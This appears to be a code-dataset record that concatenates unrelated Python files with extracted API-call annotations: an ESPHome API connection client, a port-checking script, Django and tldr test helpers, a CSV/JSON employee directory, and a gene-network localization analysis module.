family=addr.family, type=addr.type, proto=addr.proto
)
self._socket.setblocking(False)
self._socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
_LOGGER.debug(
"%s: Connecting to %s:%s (%s)",
self.log_name,
self._params.address,
self._params.port,
addr,
)
sockaddr = astuple(addr.sockaddr)
try:
coro2 = self._params.eventloop.sock_connect(self._socket, sockaddr)
await asyncio.wait_for(coro2, 30.0)
except OSError as err:
await self._on_error()
raise APIConnectionError(f"Error connecting to {sockaddr}: {err}")
except asyncio.TimeoutError:
await self._on_error()
raise APIConnectionError(f"Timeout while connecting to {sockaddr}")
_LOGGER.debug("%s: Opened socket for", self._params.address)
self._socket_reader, self._socket_writer = await asyncio.open_connection(
sock=self._socket
)
self._socket_connected = True
self._params.eventloop.create_task(self.run_forever())
hello = HelloRequest()
hello.client_info = self._params.client_info
try:
resp = await self.send_message_await_response(hello, HelloResponse)
except APIConnectionError as err:
await self._on_error()
raise err
_LOGGER.debug(
"%s: Successfully connected ('%s' API=%s.%s)",
self.log_name,
resp.server_info,
resp.api_version_major,
resp.api_version_minor,
)
self._api_version = APIVersion(resp.api_version_major, resp.api_version_minor)
if self._api_version.major > 2:
_LOGGER.error(
"%s: Incompatible version %s! Closing connection",
self.log_name,
self._api_version.major,
)
await self._on_error()
raise APIConnectionError("Incompatible API version.")
self._connected = True
self._start_ping()
async def login(self) -> None:
self._check_connected()
if self._authenticated:
raise APIConnectionError("Already logged in!")
connect = ConnectRequest()
if self._params.password is not None:
connect.password = self._params.password
resp = await self.send_message_await_response(connect, ConnectResponse)
if resp.invalid_password:
raise APIConnectionError("Invalid password!")
self._authenticated = True
def _check_connected(self) -> None:
if not self._connected:
raise APIConnectionError("Must be connected!")
@property
def is_connected(self) -> bool:
return self._connected
@property
def is_authenticated(self) -> bool:
return self._authenticated
async def _write(self, data: bytes) -> None:
# _LOGGER.debug("%s: Write: %s", self._params.address,
# ' '.join('{:02X}'.format(x) for x in data))
if not self._socket_connected:
raise APIConnectionError("Socket is not connected")
try:
async with self._write_lock:
if self._socket_writer is not None:
self._socket_writer.write(data)
await self._socket_writer.drain()
except OSError as err:
await self._on_error()
raise APIConnectionError("Error while writing data: {}".format(err))
async def send_message(self, msg: message.Message) -> None:
for message_type, klass in MESSAGE_TYPE_TO_PROTO.items():
if isinstance(msg, klass):
break
else:
raise ValueError
encoded = msg.SerializeToString()
_LOGGER.debug("%s: Sending %s: %s", self._params.address, type(msg), str(msg))
req = bytes([0])
req += varuint_to_bytes(len(encoded))
# pylint: disable=undefined-loop-variable
req += varuint_to_bytes(message_type)
req += encoded
await self._write(req)
async def send_message_callback_response(
self, send_msg: message.Message, on_message: Callable[[Any], None]
) -> None:
self._message_handlers.append(on_message)
await self.send_message(send_msg)
async def send_message_await_response_complex(
self,
send_msg: message.Message,
do_append: Callable[[Any], bool],
do_stop: Callable[[Any], bool],
timeout: float = 5.0,
) -> List[Any]:
fut = self._params.eventloop.create_future()
responses = []
def on_message(resp: message.Message) -> None:
if fut.done():
return
if do_append(resp):
responses.append(resp)
if do_stop(resp):
fut.set_result(responses)
self._message_handlers.append(on_message)
await self.send_message(send_msg)
try:
await asyncio.wait_for(fut, timeout)
except asyncio.TimeoutError:
if self._stopped:
raise APIConnectionError("Disconnected while waiting for API response!")
raise APIConnectionError("Timeout while waiting for API response!")
try:
self._message_handlers.remove(on_message)
except ValueError:
pass
return responses
async def send_message_await_response(
self, send_msg: message.Message, response_type: Any, timeout: float = 5.0
) -> Any:
def is_response(msg: message.Message) -> bool:
return isinstance(msg, response_type)
res = await self.send_message_await_response_complex(
send_msg, is_response, is_response, timeout=timeout
)
if len(res) != 1:
raise APIConnectionError("Expected one result, got {}".format(len(res)))
return res[0]
async def _recv(self, amount: int) -> bytes:
if amount == 0:
return bytes()
try:
assert self._socket_reader is not None
ret = await self._socket_reader.readexactly(amount)
except (asyncio.IncompleteReadError, OSError, TimeoutError) as err:
raise APIConnectionError("Error while receiving data: {}".format(err))
return ret
async def _recv_varint(self) -> int:
raw = bytes()
while not raw or raw[-1] & 0x80:
raw += await self._recv(1)
return cast(int, bytes_to_varuint(raw))
async def _run_once(self) -> None:
preamble = await self._recv(1)
if preamble[0] != 0x00:
raise APIConnectionError("Invalid preamble")
length = await self._recv_varint()
msg_type = await self._recv_varint()
raw_msg = await self._recv(length)
if msg_type not in MESSAGE_TYPE_TO_PROTO:
_LOGGER.debug(
"%s: Skipping message type %s", self._params.address, msg_type
)
return
msg = MESSAGE_TYPE_TO_PROTO[msg_type]()
try:
msg.ParseFromString(raw_msg)
except Exception as e:
raise APIConnectionError("Invalid protobuf message: {}".format(e))
_LOGGER.debug(
"%s: Got message of type %s: %s", self._params.address, type(msg), msg
)
for msg_handler in self._message_handlers[:]:
msg_handler(msg)
await self._handle_internal_messages(msg)
async def run_forever(self) -> None:
while True:
try:
await self._run_once()
except APIConnectionError as err:
_LOGGER.info(
"%s: Error while reading incoming messages: %s",
self.log_name,
err,
)
await self._on_error()
break
except Exception as err: # pylint: disable=broad-except
_LOGGER.info(
"%s: Unexpected error while reading incoming messages: %s",
self.log_name,
err,
)
await self._on_error()
break
async def _handle_internal_messages(self, msg: Any) -> None:
if isinstance(msg, DisconnectRequest):
await self.send_message(DisconnectResponse())
await self.stop(force=True)
elif isinstance(msg, PingRequest):
await self.send_message(PingResponse())
elif isinstance(msg, GetTimeRequest):
resp = GetTimeResponse()
resp.epoch_seconds = int(time.time())
await self.send_message(resp)
async def ping(self) -> None:
self._check_connected()
await self.send_message_await_response(PingRequest(), PingResponse)
async def _disconnect(self) -> None:
self._check_connected()
try:
await self.send_message_await_response(
DisconnectRequest(), DisconnectResponse
)
except APIConnectionError:
pass
def _check_authenticated(self) -> None:
if not self._authenticated:
raise APIConnectionError("Must login first!")
@property
def api_version(self) -> Optional[APIVersion]:
return self._api_version
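# --- Hedged illustration (not part of the original module) ---
# send_message() above frames every request as
#     0x00 | varuint(len(payload)) | varuint(message_type) | payload
# and _run_once()/_recv_varint() parse the same layout back. The real
# varuint_to_bytes()/bytes_to_varuint() helpers live elsewhere in the
# package; a minimal base-128 sketch of what they are assumed to do:
def _sketch_varuint_to_bytes(value: int) -> bytes:
    """Encode an unsigned int, 7 data bits per byte, high bit = continue."""
    result = b""
    while True:
        low = value & 0x7F
        value >>= 7
        if value:
            result += bytes([low | 0x80])  # more bytes follow
        else:
            return result + bytes([low])
def _sketch_bytes_to_varuint(raw: bytes) -> int:
    """Decode a base-128 varuint; mirrors the stop test in _recv_varint()."""
    result = 0
    for i, byte in enumerate(raw):
        result |= (byte & 0x7F) << (7 * i)
        if not byte & 0x80:
            return result
    raise ValueError("unterminated varuint")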
|
[
"asyncio.sleep",
"aioesphomeapi.host_resolver.async_resolve_host",
"asyncio.open_connection",
"socket.socket",
"time.time",
"asyncio.Lock",
"asyncio.wait_for",
"dataclasses.astuple",
"logging.getLogger"
] |
[((641, 668), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (658, 668), False, 'import logging\n'), ((1334, 1348), 'asyncio.Lock', 'asyncio.Lock', ([], {}), '()\n', (1346, 1348), False, 'import asyncio\n'), ((1483, 1497), 'asyncio.Lock', 'asyncio.Lock', ([], {}), '()\n', (1495, 1497), False, 'import asyncio\n'), ((4031, 4098), 'socket.socket', 'socket.socket', ([], {'family': 'addr.family', 'type': 'addr.type', 'proto': 'addr.proto'}), '(family=addr.family, type=addr.type, proto=addr.proto)\n', (4044, 4098), False, 'import socket\n'), ((4443, 4465), 'dataclasses.astuple', 'astuple', (['addr.sockaddr'], {}), '(addr.sockaddr)\n', (4450, 4465), False, 'from dataclasses import astuple, dataclass\n'), ((3458, 3581), 'aioesphomeapi.host_resolver.async_resolve_host', 'hr.async_resolve_host', (['self._params.eventloop', 'self._params.address', 'self._params.port', 'self._params.zeroconf_instance'], {}), '(self._params.eventloop, self._params.address, self.\n _params.port, self._params.zeroconf_instance)\n', (3479, 3581), True, 'import aioesphomeapi.host_resolver as hr\n'), ((5031, 5073), 'asyncio.open_connection', 'asyncio.open_connection', ([], {'sock': 'self._socket'}), '(sock=self._socket)\n', (5054, 5073), False, 'import asyncio\n'), ((3681, 3709), 'asyncio.wait_for', 'asyncio.wait_for', (['coro', '(30.0)'], {}), '(coro, 30.0)\n', (3697, 3709), False, 'import asyncio\n'), ((4577, 4606), 'asyncio.wait_for', 'asyncio.wait_for', (['coro2', '(30.0)'], {}), '(coro2, 30.0)\n', (4593, 4606), False, 'import asyncio\n'), ((9109, 9139), 'asyncio.wait_for', 'asyncio.wait_for', (['fut', 'timeout'], {}), '(fut, timeout)\n', (9125, 9139), False, 'import asyncio\n'), ((1797, 1834), 'asyncio.sleep', 'asyncio.sleep', (['self._params.keepalive'], {}), '(self._params.keepalive)\n', (1810, 1834), False, 'import asyncio\n'), ((12729, 12740), 'time.time', 'time.time', ([], {}), '()\n', (12738, 12740), False, 'import time\n')]
|
import time
import argparse
def check_positive_number(number):
return number > 0
def check_port(port, base=1024):
ivalue = int(port)
if ivalue <= base:
        raise argparse.ArgumentTypeError("%s is an invalid positive int value" % port)
return ivalue
def work(seconds):
time.sleep(seconds)
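# Hedged usage sketch (the parser wiring below is an assumption, not from
# the original script): check_port is shaped like an argparse `type=`
# callback, so an out-of-range value surfaces as a normal argparse error.
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="illustration only")
    parser.add_argument("--port", type=check_port, default=8080,
                        help="port number above 1024")
    args = parser.parse_args()
    print("would listen on port", args.port)
    work(0)  # sleep for 0 seconds, just to exercise work()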
|
[
"argparse.ArgumentTypeError",
"time.sleep"
] |
[((299, 318), 'time.sleep', 'time.sleep', (['seconds'], {}), '(seconds)\n', (309, 318), False, 'import time\n'), ((182, 255), 'argparse.ArgumentTypeError', 'argparse.ArgumentTypeError', (["('%s is an invalid positive int value' % value)"], {}), "('%s is an invalid positive int value' % value)\n", (208, 255), False, 'import argparse\n')]
|
from django import test
from django.urls import reverse
from django.contrib import auth
from .. import models
class HermesTestCase(test.TestCase):
fixtures = ('hermes', )
def setUp(self):
self.root_category = models.Category.objects.get(id=1)
self.second_category = models.Category.objects.get(id=2)
self.third_category = models.Category.objects.get(id=3)
self.another_category = models.Category.objects.get(id=4)
self.post1 = models.Post.objects.get(id=1)
self.post2 = models.Post.objects.get(id=2)
self.post3 = models.Post.objects.get(id=3)
self.post4 = models.Post.objects.get(id=4)
self.user = auth.models.User.objects.get(id=1)
self.client = test.Client()
def url(self, url_name, *args, **kwargs):
return reverse(url_name, args=args, kwargs=kwargs)
def get(self, url):
return self.client.get(url)
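# Hedged illustration (not part of the original test module): a concrete
# test case built on the setUp() fixtures above, showing how subclasses
# are expected to consume the loaded objects and helpers.
class ExampleSmokeTest(HermesTestCase):
    def test_fixture_objects_load(self):
        # setUp() resolved every fixture row without raising
        self.assertEqual(self.post1.id, 1)
        self.assertTrue(self.user.is_authenticated)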
|
[
"django.urls.reverse",
"django.contrib.auth.models.User.objects.get",
"django.test.Client"
] |
[((685, 719), 'django.contrib.auth.models.User.objects.get', 'auth.models.User.objects.get', ([], {'id': '(1)'}), '(id=1)\n', (713, 719), False, 'from django.contrib import auth\n'), ((743, 756), 'django.test.Client', 'test.Client', ([], {}), '()\n', (754, 756), False, 'from django import test\n'), ((819, 862), 'django.urls.reverse', 'reverse', (['url_name'], {'args': 'args', 'kwargs': 'kwargs'}), '(url_name, args=args, kwargs=kwargs)\n', (826, 862), False, 'from django.urls import reverse\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
from os import path
import shutil
from basic import BasicTestCase
class TestReindex(BasicTestCase):
def setUp(self):
super(TestReindex, self).setUp()
# Add a new page.
self.page_path = path.join(self.repo_dir, 'pages')
self.new_page = path.join(self.page_path, 'linux', 'blabla.md')
shutil.copy(path.join(self.page_path, 'linux', 'tcpflow.md'),
self.new_page)
# Backup the index.json.
shutil.copy(path.join(self.page_path, 'index.json'),
path.join(self.page_path, 'index_bak.json'))
def tearDown(self):
super(TestReindex, self).tearDown()
if path.exists(self.new_page):
os.remove(self.new_page)
# Restore the index.json.
if path.exists(path.join(self.page_path, 'index_bak.json')):
shutil.move(path.join(self.page_path, 'index_bak.json'),
path.join(self.page_path, 'index.json'))
def test_reindex(self):
before_reindex = self.call_find_command('blabla', platform='')
assert 'Sorry' in before_reindex.output
self.call_reindex_command()
after_reindex = self.call_find_command('blabla', platform='')
assert 'tcpflow' in after_reindex.output
|
[
"os.remove",
"os.path.join",
"os.path.exists"
] |
[((314, 347), 'os.path.join', 'path.join', (['self.repo_dir', '"""pages"""'], {}), "(self.repo_dir, 'pages')\n", (323, 347), False, 'from os import path\n'), ((372, 419), 'os.path.join', 'path.join', (['self.page_path', '"""linux"""', '"""blabla.md"""'], {}), "(self.page_path, 'linux', 'blabla.md')\n", (381, 419), False, 'from os import path\n'), ((765, 791), 'os.path.exists', 'path.exists', (['self.new_page'], {}), '(self.new_page)\n', (776, 791), False, 'from os import path\n'), ((440, 488), 'os.path.join', 'path.join', (['self.page_path', '"""linux"""', '"""tcpflow.md"""'], {}), "(self.page_path, 'linux', 'tcpflow.md')\n", (449, 488), False, 'from os import path\n'), ((579, 618), 'os.path.join', 'path.join', (['self.page_path', '"""index.json"""'], {}), "(self.page_path, 'index.json')\n", (588, 618), False, 'from os import path\n'), ((640, 683), 'os.path.join', 'path.join', (['self.page_path', '"""index_bak.json"""'], {}), "(self.page_path, 'index_bak.json')\n", (649, 683), False, 'from os import path\n'), ((805, 829), 'os.remove', 'os.remove', (['self.new_page'], {}), '(self.new_page)\n', (814, 829), False, 'import os\n'), ((887, 930), 'os.path.join', 'path.join', (['self.page_path', '"""index_bak.json"""'], {}), "(self.page_path, 'index_bak.json')\n", (896, 930), False, 'from os import path\n'), ((957, 1000), 'os.path.join', 'path.join', (['self.page_path', '"""index_bak.json"""'], {}), "(self.page_path, 'index_bak.json')\n", (966, 1000), False, 'from os import path\n'), ((1026, 1065), 'os.path.join', 'path.join', (['self.page_path', '"""index.json"""'], {}), "(self.page_path, 'index.json')\n", (1035, 1065), False, 'from os import path\n')]
|
from tabulate import tabulate
from methods.JSON import *
from methods.CSV import *
from methods.API import load_rand
def main():
print("welcome to the employee directory!")
start()
def start():
print("\nWelcome! choose one of the following commands: \n1: read CSV \n2: write to CSV \n3: read JSON\n4: write to JSON\n5: exit")
    try:
        input1 = int(input("write command here: "))
    except ValueError:
        # non-numeric input would otherwise raise and crash the menu
        print("please enter a valid command")
        start()
        return
if input1 == 1:
data = read_csv()
print(data)
start()
elif input1 == 2:
entry: str= ""
name=input("write employee name: ")
age=input("write employee's age: ")
dept=input("write employee's department: ")
entry = name + ", " + age + ", " + dept + "\n"
append_csv(entry)
start()
elif input1 == 3:
read_json()
start()
elif input1 == 4:
response = load_rand()
print(response)
write_json(response)
start()
elif input1 == 5:
exit()
else:
print("please enter a valid command")
start()
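# Hedged alternative sketch (illustration only, not part of the original
# program): every branch above re-enters start() recursively, so a long
# session keeps deepening the call stack and could eventually hit Python's
# recursion limit. A loop-based driver with the same shape avoids that:
def start_loop():
    while True:
        print("\nWelcome! choose a command (1-4 as listed above, 5: exit)")
        choice = input("write command here: ").strip()
        if choice == "5":
            break
        # the same read/write handlers used by start() would dispatch here
        print("command", choice, "would be dispatched here")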
main()
|
[
"methods.API.load_rand"
] |
[((858, 869), 'methods.API.load_rand', 'load_rand', ([], {}), '()\n', (867, 869), False, 'from methods.API import load_rand\n')]
|
"""
-------------------------------------------
Author: <NAME>
Date: 7/3/19
-------------------------------------------
"""
# common packages, most likely already installed
import scipy
import math
import pandas as pd
import networkx as nx
import numpy as np
import matplotlib.pyplot as plt
import scipy.stats
import sys
from scipy.special import ndtr
# uncommon packages required for this analysis
import seaborn as sns # pip install seaborn
# -------------------- LOCALIZATION ---------------------------------#
def localization(Gint, focal_genes, num_reps = 10, sample_frac = 0.8, method = 'numedges', plot = True, print_counter = False,
background_list=None):
"""
Function to calculate localization of an input set of genes (focal_genes) on a background network (Gint).
    Option to compute number of edges (method = 'numedges') or largest connected component (method = 'LCC')
    localization analysis. Calculated by repeatedly sampling subsets of the focal/random gene sets; the fraction
    to sample is set by sample_frac. Option to plot the distributions of random and focal gene localization.
    Args:
        Gint: Networkx Graph, background network to randomly sample from
        focal_genes: List, set of genes to calculate localization of
        num_reps: Int, number of times to randomly sample
        sample_frac: Float, fraction of focal genes to sample in each rep
        method: String, to decide which type of localization analysis to run. Options: 'numedges', 'LCC', or 'both'.
        plot: Bool, whether to plot the distributions in the output jupyter notebook cell
        print_counter: Bool, whether to print a counter that tells you which iteration you are on (every 25 iterations).
                       Useful when the num_reps is very high.
        background_list: List of background genes to sample from. If None, just use all interactome genes.
    Returns:
        numedges_list: List, the number of edges calculated for each rep, sampling over focal genes.
                       Empty if method = 'LCC'.
        numedges_rand: List, the number of edges calculated for each rep, sampling over random genes of
                       similar degree in the background network. Empty if method = 'LCC'.
LCC_list: List, the size of the largest connected component, calculated for each rep, sampling over focal genes.
Empty if method = 'numedges'.
LCC_rand: List, the size of the largest connected component, calculated for each rep, sampling over random genes of
similar degree in the background network. Empty if method = 'numedges'.
"""
# Create degree bins to sample from
bins = get_degree_binning(Gint, 10)
min_degree, max_degree, genes_binned = zip(*bins)
bin_df = pd.DataFrame({'min_degree':min_degree, 'max_degree':max_degree, 'genes_binned':genes_binned})
# create a lookup table for degree and index
actual_degree_to_bin_df_idx = {}
for i in range(0, bin_df['max_degree'].max() + 1):
idx_temp = bin_df[ (bin_df['min_degree'].lt(i + 1)) & (bin_df['max_degree'].gt(i - 1)) ].index.tolist()
if len(idx_temp) > 0: # there are some degrees which aren't represented in the graph
actual_degree_to_bin_df_idx[i] = idx_temp[0]
focal_genes = list(np.intersect1d(focal_genes, Gint.nodes())) # only use focal_genes which are in Gint
numedges_list = []
numedges_rand = []
LCC_list = []
LCC_rand = []
    if background_list is None:
background_list=Gint.nodes()
for r in range(num_reps):
if print_counter == True:
# so user knows how far along the process is
if (r % 25) == 0:
print(r)
focal_80 = focal_genes
np.random.shuffle(focal_80)
focal_80 = focal_80[:int(len(focal_80)*sample_frac)]
# find genes with similar degrees to focal gene degree
seed_random = []
for g in focal_80:
degree_temp = nx.degree(Gint,g)
genes_temp = bin_df.loc[actual_degree_to_bin_df_idx[degree_temp]]['genes_binned'] # use the lookup table for speed
np.random.shuffle(genes_temp) # shuffle them
while (genes_temp[0] in seed_random) or (genes_temp[0] not in background_list): # make sure the gene isn't already in the list, but is in the background_list
np.random.shuffle(genes_temp) # shuffle them
seed_random.append(genes_temp[0]) # build the seed_D1_random list
#print(len(focal_80))
#print(len(seed_random))
#print(len(np.unique(seed_random)))
if (method == 'numedges') or (method == 'both'):
# number edges calc on focal set
numedges_temp = len(nx.subgraph(Gint,focal_80).edges())
numedges_list.append(numedges_temp)
# number edges calc on random sample
numedges_temp_rand = len(nx.subgraph(Gint,seed_random).edges())
numedges_rand.append(numedges_temp_rand)
if (method == 'LCC') or (method == 'both'):
# LLC calc on focal set
G_sub_temp = nx.Graph(nx.subgraph(Gint, focal_80))
G_sub_temp = max(nx.connected_component_subgraphs(G_sub_temp), key = len)
LCC_list.append(len(G_sub_temp.nodes()))
# LLC calc on random sample
G_sub_temp = nx.Graph(nx.subgraph(Gint, seed_random))
G_sub_temp = max(nx.connected_component_subgraphs(G_sub_temp), key=len)
LCC_rand.append(len(G_sub_temp.nodes()))
if plot == True:
if (method == 'numedges') or (method == 'both'):
fig, ax = plt.subplots(figsize = (12, 7))
sns.distplot(numedges_list, ax = ax, hist = True, label = 'focal genes')
sns.distplot(numedges_rand, ax = ax, hist = True, label = 'random set')
plt.ylabel('frequency', fontsize = 16)
plt.xlabel('number of edges', fontsize = 16)
plt.title('Number of Edges Localization', fontsize = 18)
plt.legend(loc = 'upper right', fontsize = 14)
if (method == 'LCC') or (method == 'both'):
fig, ax = plt.subplots(figsize = (12, 7))
sns.distplot(LCC_list, ax = ax, hist = True, label = 'focal genes')
sns.distplot(LCC_rand, ax = ax, hist = True, label = 'random set')
plt.ylabel('frequency', fontsize = 16)
plt.xlabel('largest connected component size', fontsize = 16)
plt.title('Largest Connected Component Localization', fontsize = 18)
plt.legend(loc = 'upper right', fontsize = 14)
return numedges_list, numedges_rand, LCC_list, LCC_rand
def localization_full(Gint, focal_genes,
num_reps = 200,
method = 'LCC',
print_counter = False,
label = 'focal genes',
line_height = 0.1,
legend_loc = 'upper left'):
"""
Function to calculate localization of an input set of genes (focal_genes) on a background network (Gint).
    Option to compute number of edges (method = 'numedges') or largest connected component (method = 'LCC')
    localization analysis. Does no sub-sampling. Plots the distribution of random gene localization, and
    marks the focal set localization on that distribution. Includes p-value of focal set localization.
    Args:
        Gint: Networkx Graph, background network to randomly sample from
        focal_genes: List, set of genes to calculate localization of
        num_reps: Int, number of times to randomly sample
        method: String, to decide which type of localization analysis to run. Options: 'numedges', 'LCC', or 'both'.
        print_counter: Bool, whether to print a counter that tells you which iteration you are on (every 25 iterations).
                       Useful when the num_reps is very high.
        label: String, label for focal genes in graph legend
        line_height: Float, the height of the red line that marks the focal gene localization
        legend_loc: String, relative position of legend in graph. Something similar to 'upper left'.
    Returns:
        numedges_list: List, the number of edges calculated for each rep, over focal genes.
                       Empty if method = 'LCC'.
        numedges_rand: List, the number of edges calculated for each rep, over random genes of
                       similar degree in the background network. Empty if method = 'LCC'.
LCC_list: List, the size of the largest connected component, calculated for each rep, over focal genes.
Empty if method = 'numedges'.
LCC_rand: List, the size of the largest connected component, calculated for each rep, over random genes of
similar degree in the background network. Empty if method = 'numedges'.
"""
numedges_list, numedges_rand, LCC_list, LCC_rand = localization(Gint, focal_genes, num_reps,
sample_frac = 1,
method = method,
plot = False,
print_counter = print_counter)
if method == 'numedges':
analysis_list = numedges_list
analysis_rand = numedges_rand
title = 'number of edges'
else:
analysis_list = LCC_list
analysis_rand = LCC_rand
title = 'largest connected component'
# plot distributions for non-sampled case
fig, ax = plt.subplots(figsize = (12, 7))
sns.set_style('white')
plt.vlines(np.mean(analysis_list), ymin = 0, ymax = line_height, color = 'r', lw = 2, label = label)
sns.kdeplot(analysis_rand, ax = ax, color = 'k', lw = 2, alpha = 0.5, shade = True, label = 'random')
plt.legend(loc = legend_loc, fontsize = 12)
plt.ylabel('frequency', fontsize = 16)
plt.xlabel(title, fontsize = 16)
# print the z-score and fdr
analysis_z = (np.mean(analysis_list) - np.mean(analysis_rand))/float(np.std(analysis_rand))
print(1 - ndtr(analysis_z))
plt.title('permutation p = ' + str(1 - ndtr(analysis_z)))
return numedges_list, numedges_rand, LCC_list, LCC_rand
def get_degree_binning(g, bin_size, lengths = None):
"""
    Helper function for localization(). This function comes from network_utilities.py of emreg00/toolbox: https://github.com/emreg00/toolbox
"""
degree_to_nodes = {}
if sys.version_info >= (3, 0):
for node, degree in dict(g.degree()).items():
if lengths is not None and node not in lengths:
continue
degree_to_nodes.setdefault(degree, []).append(node)
else:
for node, degree in dict(g.degree()).iteritems():
if lengths is not None and node not in lengths:
continue
degree_to_nodes.setdefault(degree, []).append(node)
values = list(degree_to_nodes.keys())
values.sort()
bins = []
i = 0
while i < len(values):
low = values[i]
val = degree_to_nodes[values[i]]
while len(val) < bin_size:
i += 1
if i == len(values):
break
val.extend(degree_to_nodes[values[i]])
if i == len(values):
i -= 1
high = values[i]
i += 1
#print low, high, len(val)
if len(val) < bin_size:
low_, high_, val_ = bins[-1]
bins[-1] = (low_, high, val_ + val)
else:
bins.append((low, high, val))
return bins
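# Hedged usage sketch (the graph and "gene" list below are synthetic
# assumptions, not data from the original analysis): exercise the
# degree-preserving sampling on a random scale-free graph, using
# method='numedges' so no plotting or connected-component call is needed.
if __name__ == '__main__':
    G_demo = nx.barabasi_albert_graph(300, 3, seed=0)
    demo_genes = list(range(25))
    ne_focal, ne_rand, _, _ = localization(G_demo, demo_genes, num_reps=5,
                                           method='numedges', plot=False)
    print('mean focal edges:', np.mean(ne_focal),
          'mean random edges:', np.mean(ne_rand))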
|
[
"pandas.DataFrame",
"seaborn.set_style",
"matplotlib.pyplot.title",
"seaborn.kdeplot",
"networkx.degree",
"numpy.std",
"matplotlib.pyplot.legend",
"scipy.special.ndtr",
"numpy.mean",
"seaborn.distplot",
"networkx.subgraph",
"matplotlib.pyplot.ylabel",
"networkx.connected_component_subgraphs",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.subplots",
"numpy.random.shuffle"
] |
[((2872, 2972), 'pandas.DataFrame', 'pd.DataFrame', (["{'min_degree': min_degree, 'max_degree': max_degree, 'genes_binned':\n genes_binned}"], {}), "({'min_degree': min_degree, 'max_degree': max_degree,\n 'genes_binned': genes_binned})\n", (2884, 2972), True, 'import pandas as pd\n'), ((10006, 10035), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(12, 7)'}), '(figsize=(12, 7))\n', (10018, 10035), True, 'import matplotlib.pyplot as plt\n'), ((10042, 10064), 'seaborn.set_style', 'sns.set_style', (['"""white"""'], {}), "('white')\n", (10055, 10064), True, 'import seaborn as sns\n'), ((10175, 10268), 'seaborn.kdeplot', 'sns.kdeplot', (['analysis_rand'], {'ax': 'ax', 'color': '"""k"""', 'lw': '(2)', 'alpha': '(0.5)', 'shade': '(True)', 'label': '"""random"""'}), "(analysis_rand, ax=ax, color='k', lw=2, alpha=0.5, shade=True,\n label='random')\n", (10186, 10268), True, 'import seaborn as sns\n'), ((10281, 10320), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': 'legend_loc', 'fontsize': '(12)'}), '(loc=legend_loc, fontsize=12)\n', (10291, 10320), True, 'import matplotlib.pyplot as plt\n'), ((10329, 10365), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""frequency"""'], {'fontsize': '(16)'}), "('frequency', fontsize=16)\n", (10339, 10365), True, 'import matplotlib.pyplot as plt\n'), ((10372, 10402), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['title'], {'fontsize': '(16)'}), '(title, fontsize=16)\n', (10382, 10402), True, 'import matplotlib.pyplot as plt\n'), ((3864, 3891), 'numpy.random.shuffle', 'np.random.shuffle', (['focal_80'], {}), '(focal_80)\n', (3881, 3891), True, 'import numpy as np\n'), ((10081, 10103), 'numpy.mean', 'np.mean', (['analysis_list'], {}), '(analysis_list)\n', (10088, 10103), True, 'import numpy as np\n'), ((4095, 4113), 'networkx.degree', 'nx.degree', (['Gint', 'g'], {}), '(Gint, g)\n', (4104, 4113), True, 'import networkx as nx\n'), ((4252, 4281), 'numpy.random.shuffle', 'np.random.shuffle', (['genes_temp'], {}), '(genes_temp)\n', (4269, 4281), True, 'import numpy as np\n'), ((5839, 5868), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(12, 7)'}), '(figsize=(12, 7))\n', (5851, 5868), True, 'import matplotlib.pyplot as plt\n'), ((5883, 5949), 'seaborn.distplot', 'sns.distplot', (['numedges_list'], {'ax': 'ax', 'hist': '(True)', 'label': '"""focal genes"""'}), "(numedges_list, ax=ax, hist=True, label='focal genes')\n", (5895, 5949), True, 'import seaborn as sns\n'), ((5968, 6033), 'seaborn.distplot', 'sns.distplot', (['numedges_rand'], {'ax': 'ax', 'hist': '(True)', 'label': '"""random set"""'}), "(numedges_rand, ax=ax, hist=True, label='random set')\n", (5980, 6033), True, 'import seaborn as sns\n'), ((6052, 6088), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""frequency"""'], {'fontsize': '(16)'}), "('frequency', fontsize=16)\n", (6062, 6088), True, 'import matplotlib.pyplot as plt\n'), ((6103, 6145), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""number of edges"""'], {'fontsize': '(16)'}), "('number of edges', fontsize=16)\n", (6113, 6145), True, 'import matplotlib.pyplot as plt\n'), ((6160, 6214), 'matplotlib.pyplot.title', 'plt.title', (['"""Number of Edges Localization"""'], {'fontsize': '(18)'}), "('Number of Edges Localization', fontsize=18)\n", (6169, 6214), True, 'import matplotlib.pyplot as plt\n'), ((6229, 6271), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""upper right"""', 'fontsize': '(14)'}), "(loc='upper right', fontsize=14)\n", (6239, 6271), True, 'import matplotlib.pyplot as plt\n'), ((6367, 6396), 
'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(12, 7)'}), '(figsize=(12, 7))\n', (6379, 6396), True, 'import matplotlib.pyplot as plt\n'), ((6411, 6472), 'seaborn.distplot', 'sns.distplot', (['LCC_list'], {'ax': 'ax', 'hist': '(True)', 'label': '"""focal genes"""'}), "(LCC_list, ax=ax, hist=True, label='focal genes')\n", (6423, 6472), True, 'import seaborn as sns\n'), ((6491, 6551), 'seaborn.distplot', 'sns.distplot', (['LCC_rand'], {'ax': 'ax', 'hist': '(True)', 'label': '"""random set"""'}), "(LCC_rand, ax=ax, hist=True, label='random set')\n", (6503, 6551), True, 'import seaborn as sns\n'), ((6570, 6606), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""frequency"""'], {'fontsize': '(16)'}), "('frequency', fontsize=16)\n", (6580, 6606), True, 'import matplotlib.pyplot as plt\n'), ((6621, 6680), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""largest connected component size"""'], {'fontsize': '(16)'}), "('largest connected component size', fontsize=16)\n", (6631, 6680), True, 'import matplotlib.pyplot as plt\n'), ((6695, 6761), 'matplotlib.pyplot.title', 'plt.title', (['"""Largest Connected Component Localization"""'], {'fontsize': '(18)'}), "('Largest Connected Component Localization', fontsize=18)\n", (6704, 6761), True, 'import matplotlib.pyplot as plt\n'), ((6776, 6818), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': 